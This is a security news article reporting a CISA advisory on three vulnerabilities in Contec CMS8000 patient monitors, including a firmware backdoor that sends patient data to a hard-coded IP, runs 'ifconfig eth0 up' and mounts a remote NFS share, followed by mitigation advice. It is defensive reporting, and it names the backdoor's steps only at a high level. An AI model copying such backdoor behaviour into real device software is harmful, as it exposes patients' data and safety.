Malware Found in Healthcare Patient Monitors Linked to Chinese IP Address

   January 31, 2025  Posted in CyberSecurityNews


A critical cybersecurity vulnerability has been uncovered in Contec CMS8000 patient monitors, revealing embedded malware that poses significant risks to patient safety and data security.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported that the devices include a backdoor linked to a hard-coded IP address associated with a Chinese university.

The Contec CMS8000 patient monitor, widely used in hospitals and healthcare facilities, was found to have three major vulnerabilities.

CISA analysts reported the following three vulnerabilities:-

  1. Out-of-Bounds Write (CWE-787):
  • Attackers can exploit this flaw by sending specially crafted UDP requests, enabling remote code execution.
  • CVE-2024-12248 has been assigned to this vulnerability with a CVSS v4 score of 9.3, indicating critical severity.
  1. Hidden Backdoor Functionality (CWE-912):
  • The device’s firmware contains a backdoor that sends patient data to a hard-coded IP address and allows remote file uploads.
  • The backdoor executes commands such as ifconfig eth0 up to enable network connectivity and mounts a remote NFS share at /mnt/.
  • CVE-2025-0626 is associated with this issue, with a CVSS v4 score of 7.7.
  1. Privacy Leakage (CWE-359):
  • Patient data, including names, IDs, and medical details, is transmitted in plain text over port 515 to the hard-coded IP.
  • This vulnerability (CVE-2025-0683) has a CVSS v4 score of 8.2.

Impact

These vulnerabilities enable attackers to remotely execute arbitrary code on the devices, exfiltrate sensitive patient information, and modify device configurations, which could result in incorrect vital sign readings.

The malware’s behavior was confirmed through reverse engineering of the firmware, which revealed suspicious network traffic directed to the Chinese IP address. Notably, the backdoor bypasses logging mechanisms, making detection difficult.

Despite repeated notifications from CISA, Contec Health has not provided effective patches. The vulnerabilities persist even in updated firmware versions. Hospitals are advised to monitor these devices closely for signs of tampering or abnormal behavior.

Forensic analysis suggests that this backdoor may be part of broader state-sponsored cyber activities aimed at healthcare systems globally. With healthcare increasingly reliant on interconnected devices, robust cybersecurity measures are more critical than ever.

CISA and the FDA recommend immediate action to secure Contec CMS8000 monitors by disconnecting them from networks, implementing firewalls to block unauthorized access, and using subnet isolation for medical devices.

Additionally, regularly updating firmware and applying patches when available helps mitigate security risks.

Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request



Source link